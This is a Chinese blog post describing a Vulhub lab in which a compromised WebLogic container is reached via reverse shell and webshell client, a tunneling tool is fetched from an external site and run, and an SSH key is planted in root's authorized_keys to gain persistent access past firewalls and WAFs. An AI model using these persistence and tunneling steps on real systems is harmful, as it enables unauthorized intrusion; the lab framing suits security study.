linux安装weblogic_Vulhub靶机实现weblogic反序列化漏洞与内网穿透

最新推荐文章于 2024-07-30 23:56:43 发布
最新推荐文章于 2024-07-30 23:56:43 发布
阅读量506 收藏 1
点赞数
文章标签: linux安装weblogic weblogic反序列化 weblogic反序列化工具 weblogic端口连接失败

580630745b54ef96f6b6fdf8857498b8.gif

黑白之道首发,原标题:Vulhub搭建weblogic反序列化漏洞实现内网穿透

接着上篇文章

https://www.77169.net/html/265941.html

Ubuntu 192.168.50.157

Kali linux 192.168.50.53

当拿到weblogic 服务器后需要对内网的某些端口转发到公网进行各种花式操作,此次我们转发的是22端口。

登陆到Ubuntu

service docker start #首先开启docker 服务

docker ps  #查看当前docker 进行是否启动

c9c45d65bfe36bffeacf96a9464909a6.png发现进程为空、所以我们执行 docker ps -a 查看挂起的所有进程 60438ad0a731a2780ad6c07f4a296083.png使用docker start aa  启动挂起进行、也可以把ID号输全效果一样aad658f37233 f685935b6354e9daa176b042086dae64.png再次使用docker ps 查看 644397488bcde6f4e3ca0275bd7e4455.png可以看到进程已经启动、我们使用宿主机访问下 192.168.50.157:7001/console a868feae0fbcd3585c49fa64707c3921.png到此基本可以确定环境没有问题、我们登陆到靶机上安装下ssh服务。使用docker exec -it aa /bin/bash 登陆到靶机shell下 2f3572b9a1068bd34fc7299289acaef5.pngapt-get install ssh d6be5b30f45f6b519a808bb4210bc425.png报错 提示要更新系统(更新的时候可能会很慢、建议大家修改更新源) 05a5125014eafabc93c901fcb66322bf.png 041d25ee8cea07fe495237a8c2f47dd7.png再次安装 apt-get install ssh 31ed6ced422ce5fad3786374e683ad92.png可以看到已经安装成功、使用service ssh start 开启22端口 9c36bc6eb6431dcefd847c421e1315d9.png按下Ctrl+d断开当前shell连接、在Ubuntu下抓取ens33接口流量方便后期分析 8865ed8ee4cf2b2ddfb0c15d6c9d3330.png打开kali linux 进行攻击、因为上篇文章已经说了如何进行攻击 这次就不截图说明、直接在反弹后的shell 下进行操作。 96e3b6310f24d14c864dbb7918079cac.png打开冰蝎进行连接 08cc18c8ed741a8562d3a33ec229de2a.png 560bd9734895fac6845341c03020b451.png下载内网穿透工具解压后上传到根目录https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1 ecc6a58dc3727284c5330ba257e84ce2.png然后打开http://www.ngrok.cc/_book/start/ngrok_linux.html 看下使用方法./sunny clientid 隧道id隧道ID需要注册账号才能获取 220835f0ff49eb1d1e606902d190618c.png 2c91656f99f2ea7df613f4a7b68f10c2.png运行内网穿透工具 765c41dc4b998bb48c5e3b2ed87c51b4.png传入公钥到/root/.ssh/authorized_keys下 9b0337e64484d59382784dfdbf3ffd88.png使用ssh 免秘钥登录去掉注释 重启服务 service ssh restart否则登录提示需要输入密码 fb3abedf3e5cb9f6544e3b0e12f0ce5e.pngssh root@ vipgz4.idcfengye.com -p 11111 982bbe00d44d00d9a575720d83efa253.png可以看到已经不需要输入密码直接可以进行登录Weblogic环境只对外只开放了5556、7001 端口、而我们可以直接使用./sunny 进行内网穿透、无视防护墙、WAF,但是此方法容易被安全设备告警。 4ee13c57e2fd70ca7982d2eff824f709.png最后,另外有个群,有问题可以在群里问:

b8c5d97202df95ede35fbeb790454c34.png

的确,我们的群只公布出来半小时就加满了。我给个名单吧,你看认识谁让拉群就行。 如果都不认识,你分享完文章之后加我们运营,让她拉你进群。

b71d408222fb575ad61a1c1423bf6b0a.png

e3c364caa61b5728f89917ef5d08af0b.png

推荐文章++++

acdeec0be7605bdfc7376adbab49afa6.png

*使用Vulhub快速搭建攻防环境靶场+tcpdump实行流量监测

*漏洞复现环境集锦-Vulhub

*Vulhub:一键搭建漏洞测试环境

8824f13b0cb885fa4809dd298700df83.png

d149693277c7327a50250e05ba6b3de9.gif

weixin_39953356
关注
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5248
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建vulhub 工具利用: 检测: 工具weblogicScanner
Weblogic反序列化漏洞(CVE-2018-2628)实现反弹shell
Becktick的博客
04-25 2049
Weblogic反序列化漏洞(CVE-2018-2628)反弹shell 技术无罪,请勿用于恶意用途 转载请注明出处! 看见大部分复现教程都是弹计算器,创建文件夹,对于一些人来说不能满足需求,所以我准备做一个反弹shell的复现。 测试机:MacBook-Air 测试机IP:192.168.0.100 靶机IP:192.168.0.100:7001 环境: docker 工具:CVE-2018-2...
Vulhub靶场无法启动,[Too many errors, abort],library initialization failed - unable to allocate file descri
最新发布
2301_77344663的博客
07-30 428
解决vulhub靶场启动失败
解决vulhub漏洞环境下载慢卡死问题即解决docker-valhub漏洞环境下载慢的问题
m0_73615178的博客
02-25 1337
3.重新加载文件和重启docker服务。解决vulhub环境下载慢/卡。
Vulnhub靶机网卡启动失败(Raise network interfaces)
qq_35664104的博客
02-26 500
使用一些Linux靶机进行搭建后可能会出现无法搜索到IP的情况,并且会在系统启动时报错,类似下图所示这个主要是因为vulnhub上的镜像由于搭建环境、版本等问题不适配,网卡没有正确识别导致的,我们进行如下修改。
weblogic启动服务失败
qq_40769459的博客
11-28 3352
执行:./startWebLogic.sh之后报错 解决方法: 1.查java.exe的进程号,ps -aux | grep java 2.然后再杀掉进程,kill -9 进程号 3.最后再启动服务就好了 服务启动了,打开浏览器输入localhost:7001/console登录就ok  ...
一次从weblogic漏洞到内网渗透。
m0_63028223的博客
11-07 1586
红日靶场2
Weblogic】XMLDecoder反序列化漏洞(CVE-2017-10271)
时乙的博客
12-08 332
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。
JAVA反序列化漏洞复现
墨鱼菜鸡
05-31 251
目录 Weblogic反序列化漏洞 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) Weblogic反序列...
weblogic漏洞
scu_hacker博客
01-17 4235
目录 前言 一、任意文件上传 1.1影响范围 1.2 漏洞详情 二、弱口令+后台war包 三、ssrf漏洞 3.1影响范围 3.2 漏洞详情 四、反序列化漏洞 总结 前言 weblogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,本文介绍常见的几个weblogic漏洞原理、复现。 一、任意文件上传 1.1影响范围 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 .
docker | vulhub无法打开服务failed: port is already allocated/页面无法连接/页面显示的是上一个的镜像怎么办?
鱼溯的博客
02-01 893
1.“Encountered errors while bringing up the project.”;“Cannot start service struts2”;“failed: port is already allocated”,可能是端口被占用。 2.容器启动成功,但是访问页面没有成功,显示“无法连接”,可能是被防火墙拦住了。 3.明明开启的是thinkphp的环境,打开却是jboss,可能是浏览器中有缓存。 以上问题的解决方法。
CentOS7搭建vulhub,坑已踩完,速来unable to access、couldn’t connect,network is unreachable、docker.service faile
03-05 2552
vulhub搭建过程中,踩完所有坑,我觉得我最棒了
weblogic反序列化漏洞测试与解决
热门推荐
公子的专栏
01-21 2万+
一、测试 java -jar CommonsCollectionsTools.jar weblogic 192.168.0.11 7001 F:/a.txt 执行该操作后,如果该IP上的电脑生成a.txt文件,证明漏洞存在(此命令为window下操作,linux下修改文件路径,暂未测试)。 二、解决 1.快速解决 找到..\weblogic\Middleware\module
vulhub安装过程——让人头大的问题
四喜的博客
06-04 3522
环境:虚拟机 OS: centos7 1)跟着百度走,到开启漏洞环境 #docker-compose up -d ,出现以上图片问题。 解决方法:百度说paramiko模块2.4版本无法识别gssapi,将paramiko版本降低 #pip install paramiko==2.0.2 。 2)打开环境,网页...
在docker环境下安装使用vulhub靶场
Goodric的博客
07-25 1752
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。docker-compose会自动查找当前目录下的配置文件(默认文件名为docker-compose.yml),并根据其内容编译镜像和启动容器。所以,要运行某个漏洞靶场,需要先进入该漏洞所在的目录。首先要在Linux中有和环境,安装过程这里就不讲述了。——...
Ubuntu环境下Vulhub安装测试
m0_51418771的博客
10-31 386
docker-compose up -d运行后,会自动查找当前目录下的配置文件。所以,其实docker-compose up -d命令是包含了docker-compose build的。docker-compose会默认根据当前目录下的配置文件启动容器,在关闭及移除环境的时候,也需要在对应目录下。我们执行docker-compose up -d后,不要离开当前目录。但不会移除编译好的漏洞镜像,下次再执行docker-compose up -d命令,就不需要再次编译相关镜像了。
vulhub搭建与问题记录
weixin_49422491的博客
04-29 1246
参考链接 解决: 下载好之后,每次启动一个靶场的时候都需先进去相应的目录,然后2.1 启动docker 2.2、 docker依赖启动 2.3、 关闭环境 用完之后记得在对应目录使用这个关闭命令关闭环境,我以为把,云搭建的如果不关的话,会被学安全的小伙伴玩坏的~哈哈哈哈,我害怕。也不知道关了会不会安全些,但养成好习惯,用完就关掉总是好的。 二、本地Ubuntu虚拟机搭建vulhub 依旧是搜了一下别人怎么搭建的。然后,跟着这个博客搭建vulhub。然后我问我朋友要怎么访问,他说“172.18.1.0:
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1615
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
kali linux搭建vulhub环境
箭雨镜屋
05-04 1365
首先需要安装docker、docker-compose。这部分我是根据这个教程安装的,一遍成功:kali安装docker环境 - 知乎 (zhihu.com)
WebLogic 10.3.6 反序列化漏洞补丁安装指南
在网络安全领域,反序列化漏洞是一种常见的攻击手段,攻击者可以通过恶意构造的序列化对象来触发服务器的不安全行为,可能导致远程代码执行、信息泄露等严重后果。WebLogic,作为Oracle公司的一款企业级应用服务器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值